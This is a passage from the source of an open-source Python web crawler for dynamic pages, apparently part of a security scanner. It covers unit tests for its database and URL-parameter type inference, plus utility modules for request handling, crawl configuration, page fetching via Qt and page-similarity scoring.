        clickable1 = Clickable("click", "a", "body/div/div/a", id = "Test1", html_class = "Test2", clickable_depth = 243, function_id = "Test3")
        self.database._insert_clickable_into_db(SESSION, WEBPAGE_ID, clickable1)

        clickables = self.database.get_all_clickables_to_page_id_from_db(SESSION,WEBPAGE_ID)
        self.assertEqual(len(clickables), 1)
        self.assertEqual(clickable1, clickables[0])

        self.database.set_clickable_clicked(SESSION, WEBPAGE_ID, clickable1.dom_address, clickable1.event, clickable_depth=243, clickable_type=ClickableType.CreatesNewNavigatables)

        clickables = self.database.get_all_clickables_to_page_id_from_db(SESSION,WEBPAGE_ID)
        self.assertEqual(len(clickables), 1)
        # Mirror the expected database-side mutation on the local object.
        clickable1.clicked = True
        clickable1.clickable_type = ClickableType.CreatesNewNavigatables
        self.assertEqual(clickable1, clickables[0])

    def test_webpage(self):
        """A stored page is retrievable both by id and by URL."""
        clickable1 = Clickable("click", "a", "body/div/div/a", id = "Test1", html_class = "Test2", clickable_depth = 243, function_id = "Test3")
        web_page = WebPage(1, url= TEST_URL1, html= TEST_HTML, cookiesjar= None, depth= 24, base_url= TEST_URL2)
        web_page.clickables.extend([clickable1])
        self.database.insert_page_into_db(SESSION, web_page)
        web_page1 = self.database.get_webpage_to_id_from_db(SESSION, 1)
        self.assertEqual(web_page.toString(), web_page1.toString())
        web_page2 = self.database.get_webpage_to_url_from_db(SESSION, TEST_URL1)
        self.assertEqual(web_page.toString(), web_page2.toString())

    def test_form1(self):
        """A form with its inputs round-trips through the database."""
        form_input1 = FormInput("INPUT", "Username", input_type="text", values=None)
        form_input2 = FormInput("INPUT", "Password", input_type="password", values=None)
        form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)

        self.database.insert_form(SESSION,form, WEBPAGE_ID)
        self.assertEqual(self.database.forms.count(), 1)
        form1 = self.database.get_all_forms_to_page_id_from_db(SESSION,WEBPAGE_ID)
        self.assertEqual(form, form1[0])
        self.assertEqual(form.toString(), form1[0].toString())

    def test_similar_forms(self):
        """Forms differing only in input values are merged into one stored form."""
        form_input1 = FormInput("INPUT", "Test1", input_type="text", values=["Thomas"])
        form_input2 = FormInput("INPUT", "Test2", input_type="text", values=["Mueller"])
        form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)
        self.database.insert_form(SESSION,form, WEBPAGE_ID)
        self.assertEqual(self.database.forms.count(), 1)

        form_input1 = FormInput("INPUT", "Test1", input_type="text", values=["Edgar"])
        form_input2 = FormInput("INPUT", "Test2", input_type="text", values=["Mueller"])
        form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)
        self.database.insert_form(SESSION,form, WEBPAGE_ID)
        self.assertEqual(self.database.forms.count(), 1)

        form_input1 = FormInput("INPUT", "Test1", input_type="text", values=["Thomas, Edgar"])
        form_input2 = FormInput("INPUT", "Test2", input_type="text", values=["Mueller"])
        form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)
        self.database.insert_form(SESSION,form, WEBPAGE_ID)
        self.assertEqual(self.database.forms.count(), 1)


        expected_form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)
        form1 = self.database.get_all_forms_to_page_id_from_db(SESSION,WEBPAGE_ID)[0]
        self.assertEqual(form1.toString(), expected_form.toString())

    def test_not_similar_forms(self):
        """Forms with different input names are stored as distinct forms."""
        form_input1 = FormInput("INPUT", "Test1", input_type="text", values=["Thomas"])
        form_input2 = FormInput("INPUT", "Test3", input_type="text", values=["Mueller"])
        form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)
        self.database.insert_form(SESSION,form, WEBPAGE_ID)
        self.assertEqual(self.database.forms.count(), 1)

        form_input1 = FormInput("INPUT", "Test1", input_type="text", values=["Edgar"])
        form_input2 = FormInput("INPUT", "Test2", input_type="text", values=["Mueller"])
        form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)
        self.database.insert_form(SESSION,form, WEBPAGE_ID)
        self.assertEqual(self.database.forms.count(), 2)

    def test_web_page_extend_ajax(self):
        """AJAX requests can be appended to an already-stored page."""
        web_page = deepcopy(WEBPAGE)
        clickable = deepcopy(CLICKABLE)
        web_page.clickables.extend([clickable])
        self.database.insert_page_into_db(SESSION, web_page)
        ajax = deepcopy(AJAXREQUEST)
        self.database.extend_ajax_requests_to_webpage(SESSION, web_page, [ajax])

        web_page.ajax_requests = [ajax]
        test_page = self.database.get_webpage_to_url_from_db(SESSION, web_page.url)
        self.assertEqual(web_page.toString(),test_page.toString())
        self.assertEqual(web_page.ajax_requests[0], ajax)
167 |
168 |
169 |
# Allow running this test module directly as a script.
if __name__ == '__main__':
    unittest.main()
172 |
--------------------------------------------------------------------------------
/crawler/tests/domainhandlertest.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | from database.databasemanager import DatabaseManager
19 | from models.urlstructure import ParameterType
20 | from utils.domainhandler import DomainHandler
21 | from utils.user import User
22 |
23 | __author__ = 'constantin'
24 |
25 | import unittest
26 |
27 |
class DomainHandlerTest(unittest.TestCase):
    """Tests for DomainHandler's URL-parameter type inference and URL creation.

    Method names are prefixed a_/b_ because unittest runs test methods in
    alphabetical order and b relies on the type lattice exercised by a.
    """

    def setUp(self):
        self.persistence_manager = DatabaseManager(User("DummyUser", 0))
        self.domain_handler = DomainHandler("example.com", self.persistence_manager)

    def test_a_parameter_calculation(self):
        """The observed-value type lattice: each (previous type, new value) pair
        widens to the expected combined ParameterType."""
        self.assertEqual(self.domain_handler.calculate_new_url_type(None, "a"), ParameterType.Char)
        self.assertEqual(self.domain_handler.calculate_new_url_type(None, "4"), ParameterType.Digit)
        self.assertEqual(self.domain_handler.calculate_new_url_type(None, "afd"), ParameterType.String)
        self.assertEqual(self.domain_handler.calculate_new_url_type(None, "1.5"), ParameterType.Float)
        self.assertEqual(self.domain_handler.calculate_new_url_type(None, "42342"), ParameterType.Integer)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "a"), ParameterType.Char)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "1"), ParameterType.Digit)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "12"), ParameterType.Integer)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "42.5"), ParameterType.Float)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "abc"), ParameterType.AlphaNumerical)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "abc123"), ParameterType.AlphaNumerical)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "a"), ParameterType.AlphaNumerical)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "1"), ParameterType.Float)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "1.5"), ParameterType.Float)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "abc"), ParameterType.AlphaNumerical)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "abc123"), ParameterType.AlphaNumerical)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "17"), ParameterType.Float)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "17.5"), ParameterType.Float)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Integer, "a"), ParameterType.AlphaNumerical)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Integer, "14"), ParameterType.Integer)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Integer, "14.5"), ParameterType.Float)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Integer, "abc123"), ParameterType.AlphaNumerical)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "a"), ParameterType.Char)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "4"), ParameterType.Char)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "14"), ParameterType.AlphaNumerical)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "14.5"), ParameterType.AlphaNumerical)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "abc"), ParameterType.AlphaNumerical)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "abc123"), ParameterType.AlphaNumerical)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.String, "a"), ParameterType.String)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.String, "abc"), ParameterType.String)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.String, "1"), ParameterType.AlphaNumerical)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.String, "2.3"), ParameterType.AlphaNumerical)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.String, "abc123"), ParameterType.AlphaNumerical)


    def test_b_create_url_function(self):
        """handle_url parses absolute and relative URLs, stores the structure,
        and resolves relative paths against the given base."""
        url = self.domain_handler.handle_url("http://example.com/test.php?a=5&b=abc")
        url_desc = self.persistence_manager.get_url_structure(url.url_hash)
        self.assertEqual(url_desc.get_parameter_type("b"), ParameterType.String)
        self.assertEqual(url_desc.get_parameter_type("a"), ParameterType.Digit)
        self.assertEqual(url.get_values_to_parameter("a")[0], "5")
        self.assertEqual(url.get_values_to_parameter("b")[0], "abc")


        url = self.domain_handler.handle_url("test.php?a=7&b=abc123", "http://example.com")
        url_desc = self.persistence_manager.get_url_structure(url.url_hash)
        self.assertEqual(url_desc.get_parameter_type("b"), ParameterType.AlphaNumerical)
        self.assertEqual(url_desc.get_parameter_type("a"), ParameterType.Digit)
        self.assertEqual(url.domain, "example.com")
        self.assertEqual(url.path, "/test.php")
        self.assertEqual(url.scheme, "http")
        self.assertEqual(len(url.parameters), 2)
        self.assertEqual(url.get_values_to_parameter("a")[0], "7")
        self.assertEqual(url.get_values_to_parameter("b")[0], "abc123")

        # Unknown parameter names raise rather than return a default.
        with self.assertRaises(KeyError):
            url.get_values_to_parameter("zzz")
92 |
93 |
94 |
# Allow running this test module directly as a script.
if __name__ == '__main__':
    unittest.main()
97 |
--------------------------------------------------------------------------------
/crawler/utils/__init__.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
--------------------------------------------------------------------------------
/crawler/utils/asyncrequesthandler.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 | import logging
18 | from models.asyncrequeststructure import AsyncRequestStructure
19 | from models.parametertype import ParameterType
20 | from utils.utils import calculate_new_parameter_type
21 |
22 |
23 |
class AsyncRequestHandler():
    """Attaches an AsyncRequestStructure to every AJAX/timing request of a page.

    Unknown requests get a freshly derived structure; known requests get their
    stored parameter types widened by the newly observed values.
    """

    def __init__(self, database_manager):
        self.database_manager = database_manager

    def handle_requests(self, web_page):
        """Populate request_structure on all async requests of web_page and
        return the (mutated) page."""
        for async_request in web_page.ajax_requests + web_page.timing_requests:
            request_hash = async_request.request_hash
            ajax_structure = self.database_manager.get_asyncrequest_structure(request_hash)
            if ajax_structure is None:
                # First sighting of this request: derive parameter types from scratch.
                new_parameters = {}
                try:
                    for key, value in async_request.parameters.items():
                        param_type = calculate_new_parameter_type(None, value)
                        new_parameters[key] = {"parameter_type": param_type.value}
                    async_request.request_structure = AsyncRequestStructure(request_hash, new_parameters)
                except AttributeError:
                    # parameters is not a dict (e.g. None) - store a structure
                    # without parameter information.
                    async_request.request_structure = AsyncRequestStructure(request_hash, None)
            else:
                if async_request.parameters is not None:
                    new_parameters = {}
                    # Bug fix: pre-bind key/value so the log calls below cannot
                    # raise UnboundLocalError when .items() itself fails.
                    key = value = None
                    try:
                        for key, value in async_request.parameters.items():
                            param_type = calculate_new_parameter_type(ParameterType(ajax_structure.parameters[key]['parameter_type']), value)
                            new_parameters[key] = {"parameter_type": param_type.value}
                        async_request.request_structure = AsyncRequestStructure(request_hash, new_parameters)
                    except AttributeError:
                        logging.error("AttributeError with request: {}, Key: {}, Value: {}".format(request_hash, key, value))
                        async_request.request_structure = ajax_structure
                    except KeyError:
                        logging.debug("KeyError with request: {}, Key: {}, Value: {}".format(request_hash, key, value))
                        async_request.request_structure = ajax_structure
                else:
                    # No parameters observed this time; keep the stored structure.
                    async_request.request_structure = ajax_structure
        return web_page
60 |
61 |
62 |
63 |
64 |
--------------------------------------------------------------------------------
/crawler/utils/config.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 |
17 | This class contains everything that is important for a crawl session:
18 | - name
19 | - start_page - is the start page, where the crawler should start
20 | - max_depth - How deep the crawler should go
21 | - max_click_depth - How deep a crawler should click
22 | - speed - interaction speed between Jäk and JS
23 |
24 | '''
25 | from models.utils import CrawlSpeed
26 |
class CrawlConfig():
    """Settings of one crawl session (see the module docstring for details)."""

    def __init__(self, name, start_page, max_depth = 5, max_click_depth = 5, crawl_speed=CrawlSpeed.Medium):
        self.name = name                          # session name
        self.start_page_url = start_page          # URL the crawler starts from
        self.max_depth = max_depth                # maximum link-following depth
        self.max_click_depth = max_click_depth    # maximum clicking depth
        self.process_speed = crawl_speed          # interaction speed with the page's JS
35 |
36 |
37 |
class AttackConfig():
    """
    Right now more a dummy than something useful.
    """
    def __init__(self, start_page_url, crawl_speed=CrawlSpeed.Medium):
        # Bug fix: "attack" was assigned to a throwaway local variable and
        # immediately lost; store it on the instance instead.
        self.attack = "XSS"  # only XSS attacks exist so far
        self.start_page_url = start_page_url
        self.process_speed = crawl_speed
46 |
47 |
--------------------------------------------------------------------------------
/crawler/utils/execptions.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
class LoginFormNotFound(Exception):
    """Raised when no login form can be located on the given page."""

    def __init__(self, value):
        self.value = value

    def __str__(self):
        return repr(self.value)
23 |
class PageNotFound(Exception):
    """Raised when a requested page cannot be retrieved."""

    def __init__(self, value):
        self.value = value

    def __str__(self):
        return repr(self.value)
29 |
class LoginFailed(Exception):
    """Raised when submitting the login form does not authenticate the user."""

    def __init__(self, value):
        self.value = value

    def __str__(self):
        return repr(self.value)
35 |
class ElementNotFound(Exception):
    """Raised when an expected DOM element is absent from the page."""

    def __init__(self, value):
        self.value = value

    def __str__(self):
        return repr(self.value)
41 |
class DomainHandlerNotSet(Exception):
    """Raised when an operation requires a DomainHandler that was never configured."""

    def __init__(self, value):
        self.value = value

    def __str__(self):
        return repr(self.value)
47 |
--------------------------------------------------------------------------------
/crawler/utils/requestor.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | from time import time, sleep
19 | import logging
20 |
21 | from PyQt5.Qt import QEventLoop, QTimer, QUrl
22 |
23 | from core.interactioncore import InteractionCore
24 | from models.utils import CrawlSpeed
25 |
26 |
class Requestor(InteractionCore):
    """Headless fetcher: loads a URL (or renders raw HTML) in a Qt web frame
    and returns the resulting DOM as an HTML string."""

    def __init__(self, parent, proxy, port, crawl_speed = CrawlSpeed.Medium):
        super(Requestor, self).__init__(parent, proxy, port, crawl_speed)
        self.app = parent.app

    def _loadFinished(self, result):
        # Qt load-finished slot; the rendered result is read in get() instead.
        pass

    def get(self, qurl, html=None, num_retries=1, delay = 10, timeout = 10):
        """Load qurl (or render html against qurl as base) and return the HTML.

        Retries up to num_retries times on timeout and returns '' when all
        attempts time out.
        """
        t1 = time()

        loop = QEventLoop()
        timer = QTimer()
        timer.setSingleShot(True)
        timer.timeout.connect(loop.quit)
        self.loadFinished.connect(loop.quit)
        if qurl:
            if html:
                self.setHtml(html, qurl)
            else:
                self.mainFrame().load(QUrl(qurl))
        timer.start(timeout * 1000)
        loop.exec_()  # delay here until download finished or timeout

        if timer.isActive():
            # Downloaded successfully before the timeout fired.
            timer.stop()
            self._wait(delay - (time() - t1))
            parsed_html = self.mainFrame().toHtml()
        else:
            # Did not download in time.
            if num_retries > 0:
                logging.debug('Timeout - retrying')
                # Bug fix: the retry previously passed a misspelled "timerout"
                # keyword argument, raising TypeError instead of retrying.
                # NOTE(review): html is intentionally not re-passed on retry,
                # matching the original behaviour - confirm this is desired.
                parsed_html = self.get(qurl, num_retries=num_retries - 1, timeout=timeout, delay=delay)
            else:
                logging.debug('Timed out')
                parsed_html = ''
        self.mainFrame().setHtml(None)
        return parsed_html

    def _wait(self, timeout=1, pattern=None):
        """Pump the Qt event loop for (at most) timeout seconds."""
        deadline = time() + timeout
        while time() < deadline:
            sleep(0)
            self.app.processEvents()

    def javaScriptConsoleMessage(self, message, lineNumber, sourceID):
        # Surface in-page console output in the crawler log.
        logging.debug("Console: " + message + " at: " + str(lineNumber))

    def __del__(self):
        pass
--------------------------------------------------------------------------------
/crawler/utils/user.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 |
17 |
18 | This class contains everything, that is important for a user. It specifies, mainly the login behaviour.
19 | Notice: A crawl session(one config) can have multiple users
20 | - username - for identifying later the user
21 | - user_level - can be interesting for later comparison for different views
- url_with_login_form - URL of the page that contains this user's login form
23 | - login_data = dict, that contains mainly username and password
24 |
25 | '''
26 |
27 | import uuid
28 |
29 |
class User():
    """A crawl-session user: identity, privilege level and login details.

    A crawl session (one config) can have multiple users.
    """

    def __init__(self, username, user_level, url_with_login_form=None, login_data=None, session=None):
        """Create a user.

        :param username: identifier for the user
        :param user_level: privilege level, used to compare different views
        :param url_with_login_form: URL of the page containing the login form
        :param login_data: dict with the login credentials (username/password)
        :param session: explicit session id; a fresh UUID is generated when omitted
        """
        self.login_data = login_data
        self.username = username
        self.url_with_login_form = url_with_login_form
        self.user_level = user_level
        # BUG FIX: the old default `session=uuid.uuid4()` was evaluated only
        # once, at class-definition time, so every User created without an
        # explicit session shared the same UUID. Generate one per instance.
        self.session = session if session is not None else uuid.uuid4()
--------------------------------------------------------------------------------
/crawler/utils/utils.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 |
import logging
import os
import string

from Cython.Compiler.Options import normalise_encoding_name
from PyQt5.QtCore import QUrl
from PyQt5.QtNetwork import QNetworkCookie

from models.deltapage import DeltaPage
from models.parametertype import ParameterType
27 |
28 |
def form_to_dict(form, key_values = None):
    """Map each form parameter's name to a value.

    Values come from *key_values* when the name is present there, otherwise
    the parameter's own default values are used. The special "redirect_to"
    parameter is always skipped.

    :param form: object with a ``parameter`` iterable of elements carrying
                 ``name`` and ``values`` attributes
    :param key_values: optional dict of overriding values
    :return: dict mapping parameter name -> value
    """
    # BUG FIX: removed a stray bare `QStr` expression that raised NameError,
    # and guard against the default key_values=None (``in None`` is a TypeError).
    if key_values is None:
        key_values = {}
    result = {}
    for elem in form.parameter:
        if elem.name == "redirect_to":
            continue
        if elem.name in key_values:
            result[elem.name] = key_values[elem.name]
        else:
            result[elem.name] = elem.values
    return result
40 |
41 |
42 | #substract the page-parameters in the parent-class from the delta-class
def subtract_parent_from_delta_page(parent_page, delta_page):
    """Build a new DeltaPage holding only the elements of *delta_page* that
    the parent page does not already contain (links, clickables, forms).

    Ajax requests are copied over unchanged, since the delta page only ever
    records the newly captured ones.
    """
    result = DeltaPage(delta_page.id, delta_page.url, delta_page.html,
                       cookiesjar=delta_page.cookiejar,
                       depth=delta_page.current_depth,
                       generator=delta_page.generator,
                       parent_id=delta_page.parent_id)
    result.delta_depth = delta_page.delta_depth

    # Links: keep those the parent does not already know about.
    result.links.extend(link for link in delta_page.links
                        if link not in parent_page.links)

    # Clickables: keep the ones without an equal counterpart on the parent.
    for candidate in delta_page.clickables:
        if not any(candidate == known for known in parent_page.clickables):
            result.clickables.append(candidate)

    # Forms: same idea, using the dedicated form comparison.
    for candidate in delta_page.forms:
        if not any(two_forms_are_equal(candidate, known) for known in parent_page.forms):
            result.forms.append(candidate)

    result.ajax_requests = delta_page.ajax_requests  # They are just capturing the new one
    return result
70 |
def transfer_clicked_from_parent_to_delta(parent_page, delta_page):
    """Propagate the clicked-state from the parent page's clickables onto the
    delta page's not-yet-clicked clickables, then return the delta page.

    Clickables that compare equal are considered the same element, so the
    parent's click state carries over to the child.
    """
    for delta_clickable in delta_page.clickables:
        if delta_clickable.clicked:
            continue  # already clicked on the delta page itself
        for parent_clickable in parent_page.clickables:
            if delta_clickable == parent_clickable:
                delta_clickable.clicked = parent_clickable.clicked
    return delta_page
79 |
def calculate_similarity_between_pages(page1, page2, clickable_weight = 1.0, form_weight = 1.0, link_weight = 1.0, verbose= True):
    """Compute a weighted similarity score in [0, 1] between two pages.

    Forms, links and clickables are compared separately; each category's
    similarity is the fraction of shared items over the combined count
    (matches counted once). Categories empty on both pages drop out of the
    weighting. Identical ``toString()`` output short-circuits to 1.0.

    :param verbose: when True, writes a comparison report to
                    ``similarities/<id1> - <id2>.txt``
    :return: weighted similarity, or 1 when every category is empty
    """
    if page1.toString() == page2.toString():
        return 1.0

    form_similarity = 0.0
    identical_forms = 0.0
    form_counter = len(page1.forms) + len(page2.forms)
    if form_counter > 0:
        for p1_form in page1.forms:
            if any(two_forms_are_equal(p1_form, p2_form) for p2_form in page2.forms):
                identical_forms += 1.0
                form_counter -= 1.0  # count the matched pair only once
        form_similarity = identical_forms / form_counter
    else:
        form_weight = 0.0

    link_similarity = 0.0
    identical_links = 0.0
    link_counter = len(page1.links) + len(page2.links)
    if link_counter > 0:
        for p1_link in page1.links:
            if any(p1_link.url.abstract_url == p2_link.url.abstract_url for p2_link in page2.links):
                identical_links += 1.0
                link_counter -= 1.0
        link_similarity = identical_links / link_counter
    else:
        link_weight = 0.0

    clickable_similarity = 0.0
    identical_clickables = 0.0
    clickable_counter = len(page1.clickables) + len(page2.clickables)
    if clickable_counter > 0:
        for p1_clickable in page1.clickables:
            if any(two_clickables_are_equal(p1_clickable, p2_clickable) for p2_clickable in page2.clickables):
                identical_clickables += 1.0
                clickable_counter -= 1.0
        clickable_similarity = identical_clickables / clickable_counter
    else:
        clickable_weight = 0

    sum_weight = clickable_weight + form_weight + link_weight
    similarity= clickable_weight * clickable_similarity + form_weight * form_similarity + link_weight * link_similarity
    if sum_weight > 0:
        result = similarity / sum_weight
    else:
        result = 1  # nothing to compare in any category
    if verbose:
        # BUG FIX: create the output directory (open() crashed when it was
        # missing) and use a context manager so the handle is closed even
        # when a write raises.
        os.makedirs("similarities", exist_ok=True)
        with open("similarities/" + str(page1.id) + " - " + str(page2.id) + ".txt", "w") as f:
            f.write(page1.toString())
            f.write(" \n \n ======================================================= \n \n")
            f.write(page2.toString())
            f.write("\n \n ====================Result=========================== \n \n")
            f.write("Similarity = " + str(result) + " - Formsimilarity: " + str(form_similarity) + " - Linksimilarity: " + str(link_similarity) + " - Clickablesimilarity: " + str(clickable_similarity))
            f.write("\n Formweight: "+ str(form_weight) + " Formnum: " +str(form_counter) + " - Linkweight: " + str(link_weight) + " Linknum: " + str(link_counter) + " - Clickableweight: " + str(clickable_weight) + " Clickablenum: " + str(clickable_counter) )

    return result
155 |
def two_clickables_are_equal(c1, c2):
    """Two clickables match when event, DOM address and tag agree; when both
    carry a clickable_type, that must agree as well (a missing type on either
    side is ignored)."""
    if c1.event != c2.event or c1.dom_address != c2.dom_address or c1.tag != c2.tag:
        return False
    if c1.clickable_type is None or c2.clickable_type is None:
        return True
    return c1.clickable_type == c2.clickable_type
161 |
def two_forms_are_equal(form1, form2):
    """Forms are equal when both their content hash and the abstract URL of
    their action target agree."""
    if form1.form_hash != form2.form_hash:
        return False
    return form1.action.abstract_url == form2.action.abstract_url
164 |
def count_cookies(networkaccess_manager, url):
    """Return the number of cookies the manager's cookie jar holds for *url*.

    *url* may be a QUrl-like object (converted via toString()) or a plain
    string.
    """
    try:
        url = url.toString()
    except AttributeError:
        pass  # already a plain string
    jar = networkaccess_manager.cookieJar()
    return len(jar.cookiesForUrl(QUrl(url)))
173 |
174 |
175 |
def calculate_new_parameter_type(current_type, value):
    """Infer the ParameterType of *value*, refining *current_type*.

    On first sight (current_type is None) the type is derived from the value
    alone. On later sightings the previous classification is widened as
    needed (e.g. Digit -> Integer -> AlphaNumerical); once AlphaNumerical,
    always AlphaNumerical.

    :raises ValueError: when the value fits no known category
    """
    if current_type is None:  # When we see it the first time, then we just set this param to None
        if len(value) == 1:
            # Single characters: letter (or '/') -> Char, else digit/float.
            if value in string.ascii_lowercase + string.ascii_uppercase + "/":
                return ParameterType.Char
            elif _is_int(value):
                return ParameterType.Digit
            elif _is_float(value):
                return ParameterType.Float
            else:
                raise ValueError("Length is one but no case is specified for: {}".format(value))
        else:
            if _is_int(value):
                return ParameterType.Integer
            elif _is_float(value):
                return ParameterType.Float
            elif isinstance(value, str):
                if _has_number(value):
                    return ParameterType.AlphaNumerical
                else:
                    return ParameterType.String
            else:
                # FIX: the original message here was garbled ("Is ling but not specified...").
                raise ValueError("Value is longer than one but no case is specified for: {}".format(value))

    else:
        if current_type == ParameterType.Digit:
            return _handle_digit(value)
        elif current_type == ParameterType.Float:
            return _handle_float(value)
        elif current_type == ParameterType.Char:
            return _handle_char(value)
        elif current_type == ParameterType.Integer:
            return _handle_integer(value)
        elif current_type == ParameterType.String:
            return _handle_string(value)
        else:
            return ParameterType.AlphaNumerical  # One time alphanumerical everytime alphanumerical
213 |
214 |
215 | def _is_int(value):
216 | try:
217 | int(value)
218 | return True
219 | except ValueError:
220 | return False
221 |
222 | def _is_float(value):
223 | try:
224 | float(value)
225 | return True
226 | except ValueError:
227 | return False
228 |
def _has_number(input):
    """True when any single character of *input* parses as an int or float."""
    for char in input:
        if _is_int(char) or _is_float(char):
            return True
    return False
231 |
def _handle_digit(value):
    """Widen a previously-Digit parameter based on the new *value*."""
    if len(value) == 1:
        if _is_int(value):
            return ParameterType.Digit
        if _is_float(value):
            return ParameterType.Float
        if value in string.ascii_uppercase + string.ascii_lowercase:
            return ParameterType.Char
